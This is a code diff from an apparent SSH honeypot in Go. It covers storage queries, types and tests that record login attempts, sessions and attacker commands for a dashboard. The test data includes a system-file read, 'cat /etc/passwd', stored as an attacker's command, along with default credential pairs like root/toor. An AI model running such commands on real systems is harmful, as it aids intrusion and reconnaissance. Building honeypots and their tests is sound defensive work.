return nil, fmt.Errorf("querying filtered top IPs: %w", err)
}
defer func() { _ = rows.Close() }()
var entries []TopEntry
for rows.Next() {
var e TopEntry
if err := rows.Scan(&e.Value, &e.Country, &e.Count); err != nil {
return nil, fmt.Errorf("scanning filtered top IPs: %w", err)
}
entries = append(entries, e)
}
return entries, rows.Err()
}
func (s *SQLiteStore) GetFilteredTopCountries(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
where, args := buildAttemptWhereClause(f)
countryClause := "country != ''"
if where == "" {
where = " WHERE " + countryClause
} else {
where += " AND " + countryClause
}
args = append(args, limit)
//nolint:gosec // where clause built from trusted constants, not user input
query := `SELECT country, SUM(count) AS total FROM login_attempts` + where + ` GROUP BY country ORDER BY total DESC LIMIT ?`
rows, err := s.db.QueryContext(ctx, query, args...)
if err != nil {
return nil, fmt.Errorf("querying filtered top countries: %w", err)
}
defer func() { _ = rows.Close() }()
var entries []TopEntry
for rows.Next() {
var e TopEntry
if err := rows.Scan(&e.Value, &e.Count); err != nil {
return nil, fmt.Errorf("scanning filtered top countries: %w", err)
}
entries = append(entries, e)
}
return entries, rows.Err()
}
func (s *SQLiteStore) queryFilteredTopN(ctx context.Context, column string, limit int, f DashboardFilter) ([]TopEntry, error) {
switch column {
case "username", "password":
// valid columns
default:
return nil, fmt.Errorf("invalid column: %s", column)
}
where, args := buildAttemptWhereClause(f)
args = append(args, limit)
query := fmt.Sprintf(`
SELECT %s, SUM(count) AS total
FROM login_attempts%s
GROUP BY %s
ORDER BY total DESC
LIMIT ?`, column, where, column)
rows, err := s.db.QueryContext(ctx, query, args...)
if err != nil {
return nil, fmt.Errorf("querying filtered top %s: %w", column, err)
}
defer func() { _ = rows.Close() }()
var entries []TopEntry
for rows.Next() {
var e TopEntry
if err := rows.Scan(&e.Value, &e.Count); err != nil {
return nil, fmt.Errorf("scanning filtered top %s: %w", column, err)
}
entries = append(entries, e)
}
return entries, rows.Err()
}
func (s *SQLiteStore) Close() error { func (s *SQLiteStore) Close() error {
return s.db.Close() return s.db.Close()
} }

View File

@@ -23,17 +23,17 @@ func TestRecordLoginAttempt(t *testing.T) {
ctx := context.Background() ctx := context.Background()
// First attempt creates a new record. // First attempt creates a new record.
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1"); err != nil { if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1", ""); err != nil {
t.Fatalf("first attempt: %v", err) t.Fatalf("first attempt: %v", err)
} }
// Second attempt with same credentials increments count. // Second attempt with same credentials increments count.
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1"); err != nil { if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1", ""); err != nil {
t.Fatalf("second attempt: %v", err) t.Fatalf("second attempt: %v", err)
} }
// Different IP is a separate record. // Different IP is a separate record.
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.2"); err != nil { if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.2", ""); err != nil {
t.Fatalf("different IP: %v", err) t.Fatalf("different IP: %v", err)
} }
@@ -62,7 +62,7 @@ func TestCreateAndEndSession(t *testing.T) {
store := newTestStore(t) store := newTestStore(t)
ctx := context.Background() ctx := context.Background()
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "") id, err := store.CreateSession(ctx, "10.0.0.1", "root", "", "")
if err != nil { if err != nil {
t.Fatalf("creating session: %v", err) t.Fatalf("creating session: %v", err)
} }
@@ -100,7 +100,7 @@ func TestUpdateHumanScore(t *testing.T) {
store := newTestStore(t) store := newTestStore(t)
ctx := context.Background() ctx := context.Background()
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "") id, err := store.CreateSession(ctx, "10.0.0.1", "root", "", "")
if err != nil { if err != nil {
t.Fatalf("creating session: %v", err) t.Fatalf("creating session: %v", err)
} }
@@ -123,7 +123,7 @@ func TestAppendSessionLog(t *testing.T) {
store := newTestStore(t) store := newTestStore(t)
ctx := context.Background() ctx := context.Background()
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "") id, err := store.CreateSession(ctx, "10.0.0.1", "root", "", "")
if err != nil { if err != nil {
t.Fatalf("creating session: %v", err) t.Fatalf("creating session: %v", err)
} }
@@ -159,7 +159,7 @@ func TestDeleteRecordsBefore(t *testing.T) {
} }
// Insert a recent login attempt. // Insert a recent login attempt.
if err := store.RecordLoginAttempt(ctx, "new", "new", "2.2.2.2"); err != nil { if err := store.RecordLoginAttempt(ctx, "new", "new", "2.2.2.2", ""); err != nil {
t.Fatalf("insert recent attempt: %v", err) t.Fatalf("insert recent attempt: %v", err)
} }
@@ -178,7 +178,7 @@ func TestDeleteRecordsBefore(t *testing.T) {
} }
// Insert a recent session. // Insert a recent session.
if _, err := store.CreateSession(ctx, "2.2.2.2", "new", ""); err != nil { if _, err := store.CreateSession(ctx, "2.2.2.2", "new", "", ""); err != nil {
t.Fatalf("insert recent session: %v", err) t.Fatalf("insert recent session: %v", err)
} }
@@ -204,12 +204,81 @@ func TestDeleteRecordsBefore(t *testing.T) {
} }
} }
func TestGetTopExecCommands(t *testing.T) {
store := newTestStore(t)
ctx := context.Background()
// Create sessions with exec commands.
for range 3 {
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "", "")
if err != nil {
t.Fatalf("creating session: %v", err)
}
if err := store.SetExecCommand(ctx, id, "uname -a"); err != nil {
t.Fatalf("setting exec command: %v", err)
}
}
for range 2 {
id, err := store.CreateSession(ctx, "10.0.0.2", "admin", "", "")
if err != nil {
t.Fatalf("creating session: %v", err)
}
if err := store.SetExecCommand(ctx, id, "cat /etc/passwd"); err != nil {
t.Fatalf("setting exec command: %v", err)
}
}
// Session without exec command — should not appear.
if _, err := store.CreateSession(ctx, "10.0.0.3", "test", "bash", ""); err != nil {
t.Fatalf("creating session: %v", err)
}
entries, err := store.GetTopExecCommands(ctx, 10)
if err != nil {
t.Fatalf("GetTopExecCommands: %v", err)
}
if len(entries) != 2 {
t.Fatalf("len = %d, want 2", len(entries))
}
if entries[0].Value != "uname -a" || entries[0].Count != 3 {
t.Errorf("entries[0] = %+v, want uname -a:3", entries[0])
}
if entries[1].Value != "cat /etc/passwd" || entries[1].Count != 2 {
t.Errorf("entries[1] = %+v, want cat /etc/passwd:2", entries[1])
}
}
func TestGetRecentSessionsEventCount(t *testing.T) {
store := newTestStore(t)
ctx := context.Background()
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
if err != nil {
t.Fatalf("creating session: %v", err)
}
// Add some events.
events := []SessionEvent{
{SessionID: id, Timestamp: time.Now(), Direction: 0, Data: []byte("ls\n")},
{SessionID: id, Timestamp: time.Now(), Direction: 1, Data: []byte("file1\n")},
}
if err := store.AppendSessionEvents(ctx, events); err != nil {
t.Fatalf("appending events: %v", err)
}
sessions, err := store.GetRecentSessions(ctx, 10, false)
if err != nil {
t.Fatalf("GetRecentSessions: %v", err)
}
if len(sessions) != 1 {
t.Fatalf("len = %d, want 1", len(sessions))
}
if sessions[0].EventCount != 2 {
t.Errorf("EventCount = %d, want 2", sessions[0].EventCount)
}
}
func TestNewSQLiteStoreCreatesFile(t *testing.T) { func TestNewSQLiteStoreCreatesFile(t *testing.T) {
dbPath := filepath.Join(t.TempDir(), "subdir", "test.db") dbPath := filepath.Join(t.TempDir(), "test.db")
// Parent directory doesn't exist yet; SQLite should create it.
// Actually, SQLite doesn't create parent dirs, but the file itself.
// Use a path in the temp dir directly.
dbPath = filepath.Join(t.TempDir(), "test.db")
store, err := NewSQLiteStore(dbPath) store, err := NewSQLiteStore(dbPath)
if err != nil { if err != nil {
t.Fatalf("creating store: %v", err) t.Fatalf("creating store: %v", err)
@@ -218,7 +287,7 @@ func TestNewSQLiteStoreCreatesFile(t *testing.T) {
// Verify we can use the store. // Verify we can use the store.
ctx := context.Background() ctx := context.Background()
if err := store.RecordLoginAttempt(ctx, "test", "test", "127.0.0.1"); err != nil { if err := store.RecordLoginAttempt(ctx, "test", "test", "127.0.0.1", ""); err != nil {
t.Fatalf("recording attempt: %v", err) t.Fatalf("recording attempt: %v", err)
} }
} }

View File

@@ -11,6 +11,7 @@ type LoginAttempt struct {
Username string Username string
Password string Password string
IP string IP string
Country string
Count int Count int
FirstSeen time.Time FirstSeen time.Time
LastSeen time.Time LastSeen time.Time
@@ -20,11 +21,15 @@ type LoginAttempt struct {
type Session struct { type Session struct {
ID string ID string
IP string IP string
Country string
Username string Username string
ShellName string ShellName string
ConnectedAt time.Time ConnectedAt time.Time
DisconnectedAt *time.Time DisconnectedAt *time.Time
HumanScore *float64 HumanScore *float64
ExecCommand *string
EventCount int
InputBytes int64
} }
// SessionLog represents a single log entry for a session. // SessionLog represents a single log entry for a session.
@@ -36,14 +41,66 @@ type SessionLog struct {
Output string Output string
} }
// SessionEvent represents a single I/O event recorded during a session.
type SessionEvent struct {
SessionID string
Timestamp time.Time
Direction int // 0=input (client→server), 1=output (server→client)
Data []byte
}
// DashboardStats holds aggregate counts for the web dashboard.
type DashboardStats struct {
TotalAttempts int64
UniqueIPs int64
TotalSessions int64
ActiveSessions int64
}
// TimeSeriesPoint represents a single data point in a time series.
type TimeSeriesPoint struct {
Timestamp time.Time
Count int64
}
// HourlyCount represents the total attempts for a given hour of day.
type HourlyCount struct {
Hour int // 0-23
Count int64
}
// CountryCount represents the total attempts from a given country.
type CountryCount struct {
Country string
Count int64
}
// DashboardFilter contains optional filters for dashboard queries.
type DashboardFilter struct {
Since *time.Time
Until *time.Time
IP string
Country string
Username string
HumanScoreAboveZero bool
SortBy string
}
// TopEntry represents a value and its count for top-N queries.
type TopEntry struct {
Value string
Country string // populated by GetTopIPs
Count int64
}
// Store is the interface for persistent storage of honeypot data. // Store is the interface for persistent storage of honeypot data.
type Store interface { type Store interface {
// RecordLoginAttempt upserts a login attempt, incrementing the count // RecordLoginAttempt upserts a login attempt, incrementing the count
// for existing (username, password, ip) combinations. // for existing (username, password, ip) combinations.
RecordLoginAttempt(ctx context.Context, username, password, ip string) error RecordLoginAttempt(ctx context.Context, username, password, ip, country string) error
// CreateSession creates a new session record and returns its UUID. // CreateSession creates a new session record and returns its UUID.
CreateSession(ctx context.Context, ip, username, shellName string) (string, error) CreateSession(ctx context.Context, ip, username, shellName, country string) (string, error)
// EndSession sets the disconnected_at timestamp for a session. // EndSession sets the disconnected_at timestamp for a session.
EndSession(ctx context.Context, sessionID string, disconnectedAt time.Time) error EndSession(ctx context.Context, sessionID string, disconnectedAt time.Time) error
@@ -51,6 +108,9 @@ type Store interface {
// UpdateHumanScore sets the human detection score for a session. // UpdateHumanScore sets the human detection score for a session.
UpdateHumanScore(ctx context.Context, sessionID string, score float64) error UpdateHumanScore(ctx context.Context, sessionID string, score float64) error
// SetExecCommand sets the exec command for a session.
SetExecCommand(ctx context.Context, sessionID string, command string) error
// AppendSessionLog adds a log entry to a session. // AppendSessionLog adds a log entry to a session.
AppendSessionLog(ctx context.Context, sessionID, input, output string) error AppendSessionLog(ctx context.Context, sessionID, input, output string) error
@@ -58,6 +118,73 @@ type Store interface {
// and returns the total number of deleted rows. // and returns the total number of deleted rows.
DeleteRecordsBefore(ctx context.Context, cutoff time.Time) (int64, error) DeleteRecordsBefore(ctx context.Context, cutoff time.Time) (int64, error)
// GetDashboardStats returns aggregate counts for the dashboard.
GetDashboardStats(ctx context.Context) (*DashboardStats, error)
// GetTopUsernames returns the top N usernames by total attempt count.
GetTopUsernames(ctx context.Context, limit int) ([]TopEntry, error)
// GetTopPasswords returns the top N passwords by total attempt count.
GetTopPasswords(ctx context.Context, limit int) ([]TopEntry, error)
// GetTopIPs returns the top N IPs by total attempt count.
GetTopIPs(ctx context.Context, limit int) ([]TopEntry, error)
// GetTopCountries returns the top N countries by total attempt count.
GetTopCountries(ctx context.Context, limit int) ([]TopEntry, error)
// GetTopExecCommands returns the top N exec commands by session count.
GetTopExecCommands(ctx context.Context, limit int) ([]TopEntry, error)
// GetRecentSessions returns the most recent sessions ordered by connected_at DESC.
// If activeOnly is true, only sessions with no disconnected_at are returned.
GetRecentSessions(ctx context.Context, limit int, activeOnly bool) ([]Session, error)
// GetFilteredSessions returns sessions matching the given filter, ordered
// by the filter's SortBy field (default: connected_at DESC).
GetFilteredSessions(ctx context.Context, limit int, activeOnly bool, f DashboardFilter) ([]Session, error)
// GetSession returns a single session by ID.
GetSession(ctx context.Context, sessionID string) (*Session, error)
// GetSessionLogs returns all log entries for a session ordered by timestamp.
GetSessionLogs(ctx context.Context, sessionID string) ([]SessionLog, error)
// AppendSessionEvents batch-inserts session events.
AppendSessionEvents(ctx context.Context, events []SessionEvent) error
// GetSessionEvents returns all events for a session ordered by id.
GetSessionEvents(ctx context.Context, sessionID string) ([]SessionEvent, error)
// CloseActiveSessions sets disconnected_at for all sessions that are
// still marked as active. This should be called at startup to clean up
// sessions left over from a previous unclean shutdown.
CloseActiveSessions(ctx context.Context, disconnectedAt time.Time) (int64, error)
// GetAttemptsOverTime returns daily attempt counts for the last N days.
GetAttemptsOverTime(ctx context.Context, days int, since, until *time.Time) ([]TimeSeriesPoint, error)
// GetHourlyPattern returns total attempts grouped by hour of day (0-23).
GetHourlyPattern(ctx context.Context, since, until *time.Time) ([]HourlyCount, error)
// GetCountryStats returns total attempts per country, ordered by count DESC.
GetCountryStats(ctx context.Context) ([]CountryCount, error)
// GetFilteredDashboardStats returns aggregate counts with optional filters applied.
GetFilteredDashboardStats(ctx context.Context, f DashboardFilter) (*DashboardStats, error)
// GetFilteredTopUsernames returns top usernames with optional filters applied.
GetFilteredTopUsernames(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error)
// GetFilteredTopPasswords returns top passwords with optional filters applied.
GetFilteredTopPasswords(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error)
// GetFilteredTopIPs returns top IPs with optional filters applied.
GetFilteredTopIPs(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error)
// GetFilteredTopCountries returns top countries with optional filters applied.
GetFilteredTopCountries(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error)
// Close releases any resources held by the store. // Close releases any resources held by the store.
Close() error Close() error
} }

View File

@@ -0,0 +1,891 @@
package storage
import (
"context"
"path/filepath"
"testing"
"time"
)
// storeFactory returns a clean Store and a cleanup function.
type storeFactory func(t *testing.T) Store
func testStores(t *testing.T, f func(t *testing.T, newStore storeFactory)) {
t.Helper()
t.Run("SQLite", func(t *testing.T) {
f(t, func(t *testing.T) Store {
t.Helper()
dbPath := filepath.Join(t.TempDir(), "test.db")
s, err := NewSQLiteStore(dbPath)
if err != nil {
t.Fatalf("creating SQLiteStore: %v", err)
}
t.Cleanup(func() { _ = s.Close() })
return s
})
})
t.Run("Memory", func(t *testing.T) {
f(t, func(t *testing.T) Store {
t.Helper()
return NewMemoryStore()
})
})
}
func seedData(t *testing.T, store Store) {
t.Helper()
ctx := context.Background()
// Login attempts: root/toor from two IPs, admin/admin from one IP.
for range 5 {
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1", ""); err != nil {
t.Fatalf("seeding attempt: %v", err)
}
}
for range 3 {
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.2", ""); err != nil {
t.Fatalf("seeding attempt: %v", err)
}
}
for range 2 {
if err := store.RecordLoginAttempt(ctx, "admin", "admin", "10.0.0.1", ""); err != nil {
t.Fatalf("seeding attempt: %v", err)
}
}
// Sessions: one active, one ended.
id1, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
if err != nil {
t.Fatalf("creating session: %v", err)
}
if err := store.EndSession(ctx, id1, time.Now()); err != nil {
t.Fatalf("ending session: %v", err)
}
if _, err := store.CreateSession(ctx, "10.0.0.2", "admin", "bash", ""); err != nil {
t.Fatalf("creating session: %v", err)
}
}
func TestGetDashboardStats(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("empty", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
stats, err := store.GetDashboardStats(ctx)
if err != nil {
t.Fatalf("GetDashboardStats: %v", err)
}
if stats.TotalAttempts != 0 || stats.UniqueIPs != 0 || stats.TotalSessions != 0 || stats.ActiveSessions != 0 {
t.Errorf("expected all zeros, got %+v", stats)
}
})
t.Run("with data", func(t *testing.T) {
store := newStore(t)
seedData(t, store)
ctx := context.Background()
stats, err := store.GetDashboardStats(ctx)
if err != nil {
t.Fatalf("GetDashboardStats: %v", err)
}
// 5 + 3 + 2 = 10 total attempts
if stats.TotalAttempts != 10 {
t.Errorf("TotalAttempts = %d, want 10", stats.TotalAttempts)
}
// 2 unique IPs: 10.0.0.1 and 10.0.0.2
if stats.UniqueIPs != 2 {
t.Errorf("UniqueIPs = %d, want 2", stats.UniqueIPs)
}
if stats.TotalSessions != 2 {
t.Errorf("TotalSessions = %d, want 2", stats.TotalSessions)
}
if stats.ActiveSessions != 1 {
t.Errorf("ActiveSessions = %d, want 1", stats.ActiveSessions)
}
})
})
}
func TestGetTopUsernames(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("empty", func(t *testing.T) {
store := newStore(t)
entries, err := store.GetTopUsernames(context.Background(), 10)
if err != nil {
t.Fatalf("GetTopUsernames: %v", err)
}
if len(entries) != 0 {
t.Errorf("expected empty, got %v", entries)
}
})
t.Run("with data", func(t *testing.T) {
store := newStore(t)
seedData(t, store)
entries, err := store.GetTopUsernames(context.Background(), 10)
if err != nil {
t.Fatalf("GetTopUsernames: %v", err)
}
if len(entries) != 2 {
t.Fatalf("len = %d, want 2", len(entries))
}
// root: 5 + 3 = 8, admin: 2
if entries[0].Value != "root" || entries[0].Count != 8 {
t.Errorf("entries[0] = %+v, want root/8", entries[0])
}
if entries[1].Value != "admin" || entries[1].Count != 2 {
t.Errorf("entries[1] = %+v, want admin/2", entries[1])
}
})
t.Run("limit", func(t *testing.T) {
store := newStore(t)
seedData(t, store)
entries, err := store.GetTopUsernames(context.Background(), 1)
if err != nil {
t.Fatalf("GetTopUsernames: %v", err)
}
if len(entries) != 1 {
t.Fatalf("len = %d, want 1", len(entries))
}
})
})
}
func TestGetTopPasswords(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
store := newStore(t)
seedData(t, store)
entries, err := store.GetTopPasswords(context.Background(), 10)
if err != nil {
t.Fatalf("GetTopPasswords: %v", err)
}
if len(entries) != 2 {
t.Fatalf("len = %d, want 2", len(entries))
}
// toor: 8, admin: 2
if entries[0].Value != "toor" || entries[0].Count != 8 {
t.Errorf("entries[0] = %+v, want toor/8", entries[0])
}
})
}
func TestGetTopIPs(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
store := newStore(t)
seedData(t, store)
entries, err := store.GetTopIPs(context.Background(), 10)
if err != nil {
t.Fatalf("GetTopIPs: %v", err)
}
if len(entries) != 2 {
t.Fatalf("len = %d, want 2", len(entries))
}
// 10.0.0.1: 5 + 2 = 7, 10.0.0.2: 3
if entries[0].Value != "10.0.0.1" || entries[0].Count != 7 {
t.Errorf("entries[0] = %+v, want 10.0.0.1/7", entries[0])
}
})
}
func TestGetSession(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("not found", func(t *testing.T) {
store := newStore(t)
s, err := store.GetSession(context.Background(), "nonexistent")
if err != nil {
t.Fatalf("GetSession: %v", err)
}
if s != nil {
t.Errorf("expected nil, got %+v", s)
}
})
t.Run("found", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
s, err := store.GetSession(ctx, id)
if err != nil {
t.Fatalf("GetSession: %v", err)
}
if s == nil {
t.Fatal("expected session, got nil")
}
if s.ID != id || s.IP != "10.0.0.1" || s.Username != "root" || s.ShellName != "bash" {
t.Errorf("unexpected session: %+v", s)
}
})
})
}
func TestGetSessionLogs(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
store := newStore(t)
ctx := context.Background()
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
if err := store.AppendSessionLog(ctx, id, "ls", "file1\nfile2"); err != nil {
t.Fatalf("AppendSessionLog: %v", err)
}
if err := store.AppendSessionLog(ctx, id, "pwd", "/home/root"); err != nil {
t.Fatalf("AppendSessionLog: %v", err)
}
logs, err := store.GetSessionLogs(ctx, id)
if err != nil {
t.Fatalf("GetSessionLogs: %v", err)
}
if len(logs) != 2 {
t.Fatalf("len = %d, want 2", len(logs))
}
if logs[0].Input != "ls" {
t.Errorf("logs[0].Input = %q, want %q", logs[0].Input, "ls")
}
if logs[1].Input != "pwd" {
t.Errorf("logs[1].Input = %q, want %q", logs[1].Input, "pwd")
}
})
}
func TestSessionEvents(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("empty", func(t *testing.T) {
store := newStore(t)
events, err := store.GetSessionEvents(context.Background(), "nonexistent")
if err != nil {
t.Fatalf("GetSessionEvents: %v", err)
}
if len(events) != 0 {
t.Errorf("expected empty, got %d", len(events))
}
})
t.Run("append and retrieve", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
now := time.Now().UTC()
events := []SessionEvent{
{SessionID: id, Timestamp: now, Direction: 0, Data: []byte("ls\n")},
{SessionID: id, Timestamp: now.Add(100 * time.Millisecond), Direction: 1, Data: []byte("file1\nfile2\n")},
{SessionID: id, Timestamp: now.Add(200 * time.Millisecond), Direction: 0, Data: []byte("pwd\n")},
}
if err := store.AppendSessionEvents(ctx, events); err != nil {
t.Fatalf("AppendSessionEvents: %v", err)
}
got, err := store.GetSessionEvents(ctx, id)
if err != nil {
t.Fatalf("GetSessionEvents: %v", err)
}
if len(got) != 3 {
t.Fatalf("len = %d, want 3", len(got))
}
if got[0].Direction != 0 || string(got[0].Data) != "ls\n" {
t.Errorf("got[0] = %+v", got[0])
}
if got[1].Direction != 1 || string(got[1].Data) != "file1\nfile2\n" {
t.Errorf("got[1] = %+v", got[1])
}
})
t.Run("append empty", func(t *testing.T) {
store := newStore(t)
if err := store.AppendSessionEvents(context.Background(), nil); err != nil {
t.Fatalf("AppendSessionEvents(nil): %v", err)
}
})
})
}
func TestCloseActiveSessions(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("no active sessions", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
n, err := store.CloseActiveSessions(ctx, time.Now())
if err != nil {
t.Fatalf("CloseActiveSessions: %v", err)
}
if n != 0 {
t.Errorf("closed %d, want 0", n)
}
})
t.Run("closes only active sessions", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
// Create 3 sessions: end one, leave two active.
id1, _ := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
store.CreateSession(ctx, "10.0.0.2", "admin", "bash", "")
store.CreateSession(ctx, "10.0.0.3", "test", "bash", "")
store.EndSession(ctx, id1, time.Now())
n, err := store.CloseActiveSessions(ctx, time.Now())
if err != nil {
t.Fatalf("CloseActiveSessions: %v", err)
}
if n != 2 {
t.Errorf("closed %d, want 2", n)
}
// Verify no active sessions remain.
active, err := store.GetRecentSessions(ctx, 10, true)
if err != nil {
t.Fatalf("GetRecentSessions: %v", err)
}
if len(active) != 0 {
t.Errorf("active sessions = %d, want 0", len(active))
}
})
})
}
func TestSetExecCommand(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("set and retrieve", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
// Initially nil.
s, err := store.GetSession(ctx, id)
if err != nil {
t.Fatalf("GetSession: %v", err)
}
if s.ExecCommand != nil {
t.Errorf("expected nil ExecCommand, got %q", *s.ExecCommand)
}
// Set exec command.
if err := store.SetExecCommand(ctx, id, "uname -a"); err != nil {
t.Fatalf("SetExecCommand: %v", err)
}
s, err = store.GetSession(ctx, id)
if err != nil {
t.Fatalf("GetSession: %v", err)
}
if s.ExecCommand == nil {
t.Fatal("expected non-nil ExecCommand")
}
if *s.ExecCommand != "uname -a" {
t.Errorf("ExecCommand = %q, want %q", *s.ExecCommand, "uname -a")
}
})
t.Run("appears in recent sessions", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
if err != nil {
t.Fatalf("CreateSession: %v", err)
}
if err := store.SetExecCommand(ctx, id, "id"); err != nil {
t.Fatalf("SetExecCommand: %v", err)
}
sessions, err := store.GetRecentSessions(ctx, 10, false)
if err != nil {
t.Fatalf("GetRecentSessions: %v", err)
}
if len(sessions) != 1 {
t.Fatalf("len = %d, want 1", len(sessions))
}
if sessions[0].ExecCommand == nil || *sessions[0].ExecCommand != "id" {
t.Errorf("ExecCommand = %v, want \"id\"", sessions[0].ExecCommand)
}
})
})
}
func seedChartData(t *testing.T, store Store) {
t.Helper()
ctx := context.Background()
// Record attempts with country data from different IPs.
for range 5 {
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1", "CN"); err != nil {
t.Fatalf("seeding attempt: %v", err)
}
}
for range 3 {
if err := store.RecordLoginAttempt(ctx, "admin", "admin", "10.0.0.2", "RU"); err != nil {
t.Fatalf("seeding attempt: %v", err)
}
}
for range 2 {
if err := store.RecordLoginAttempt(ctx, "root", "123456", "10.0.0.3", "CN"); err != nil {
t.Fatalf("seeding attempt: %v", err)
}
}
}
func TestGetAttemptsOverTime(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("empty", func(t *testing.T) {
store := newStore(t)
points, err := store.GetAttemptsOverTime(context.Background(), 30, nil, nil)
if err != nil {
t.Fatalf("GetAttemptsOverTime: %v", err)
}
if len(points) != 0 {
t.Errorf("expected empty, got %v", points)
}
})
t.Run("with data", func(t *testing.T) {
store := newStore(t)
seedChartData(t, store)
points, err := store.GetAttemptsOverTime(context.Background(), 30, nil, nil)
if err != nil {
t.Fatalf("GetAttemptsOverTime: %v", err)
}
// All data was inserted today, so should be one point.
if len(points) != 1 {
t.Fatalf("len = %d, want 1", len(points))
}
// 5 + 3 + 2 = 10 total.
if points[0].Count != 10 {
t.Errorf("count = %d, want 10", points[0].Count)
}
})
})
}
func TestGetHourlyPattern(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("empty", func(t *testing.T) {
store := newStore(t)
counts, err := store.GetHourlyPattern(context.Background(), nil, nil)
if err != nil {
t.Fatalf("GetHourlyPattern: %v", err)
}
if len(counts) != 0 {
t.Errorf("expected empty, got %v", counts)
}
})
t.Run("with data", func(t *testing.T) {
store := newStore(t)
seedChartData(t, store)
counts, err := store.GetHourlyPattern(context.Background(), nil, nil)
if err != nil {
t.Fatalf("GetHourlyPattern: %v", err)
}
// All data was inserted at the same hour.
if len(counts) != 1 {
t.Fatalf("len = %d, want 1", len(counts))
}
if counts[0].Count != 10 {
t.Errorf("count = %d, want 10", counts[0].Count)
}
})
})
}
func TestGetCountryStats(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("empty", func(t *testing.T) {
store := newStore(t)
counts, err := store.GetCountryStats(context.Background())
if err != nil {
t.Fatalf("GetCountryStats: %v", err)
}
if len(counts) != 0 {
t.Errorf("expected empty, got %v", counts)
}
})
t.Run("with data", func(t *testing.T) {
store := newStore(t)
seedChartData(t, store)
counts, err := store.GetCountryStats(context.Background())
if err != nil {
t.Fatalf("GetCountryStats: %v", err)
}
if len(counts) != 2 {
t.Fatalf("len = %d, want 2", len(counts))
}
// CN: 5 + 2 = 7, RU: 3 - ordered by count DESC.
if counts[0].Country != "CN" || counts[0].Count != 7 {
t.Errorf("counts[0] = %+v, want CN/7", counts[0])
}
if counts[1].Country != "RU" || counts[1].Count != 3 {
t.Errorf("counts[1] = %+v, want RU/3", counts[1])
}
})
t.Run("excludes empty country", func(t *testing.T) {
store := newStore(t)
ctx := context.Background()
if err := store.RecordLoginAttempt(ctx, "test", "test", "10.0.0.1", ""); err != nil {
t.Fatalf("seeding: %v", err)
}
if err := store.RecordLoginAttempt(ctx, "test", "test", "10.0.0.2", "US"); err != nil {
t.Fatalf("seeding: %v", err)
}
counts, err := store.GetCountryStats(ctx)
if err != nil {
t.Fatalf("GetCountryStats: %v", err)
}
if len(counts) != 1 {
t.Fatalf("len = %d, want 1", len(counts))
}
if counts[0].Country != "US" {
t.Errorf("country = %q, want US", counts[0].Country)
}
})
})
}
func TestGetFilteredDashboardStats(t *testing.T) {
testStores(t, func(t *testing.T, newStore storeFactory) {
t.Run("no filter", func(t *testing.T) {
store := newStore(t)
seedChartData(t, store)
stats, err := store.GetFilteredDashboardStats(context.Background(), DashboardFilter{})
if err != nil {
t.Fatalf("GetFilteredDashboardStats: %v", err)
}
if stats.TotalAttempts != 10 {
t.Errorf("TotalAttempts = %d, want 10", stats.TotalAttempts)
}
})
t.Run("filter by country", func(t *testing.T) {
store := newStore(t)
seedChartData(t, store)
stats, err := store.GetFilteredDashboardStats(context.Background(), DashboardFilter{Country: "CN"})
if err != nil {
t.Fatalf("GetFilteredDashboardStats: %v", err)
}
// CN: 5 + 2 = 7
if stats.TotalAttempts != 7 {
t.Errorf("TotalAttempts = %d, want 7", stats.TotalAttempts)
}
})
t.Run("filter by IP", func(t *testing.T) {
store := newStore(t)
seedChartData(t, store)
stats, err := store.GetFilteredDashboardStats(context.Background(), DashboardFilter{IP: "10.0.0.1"})
if err != nil {
t.Fatalf("GetFilteredDashboardStats: %v", err)
}
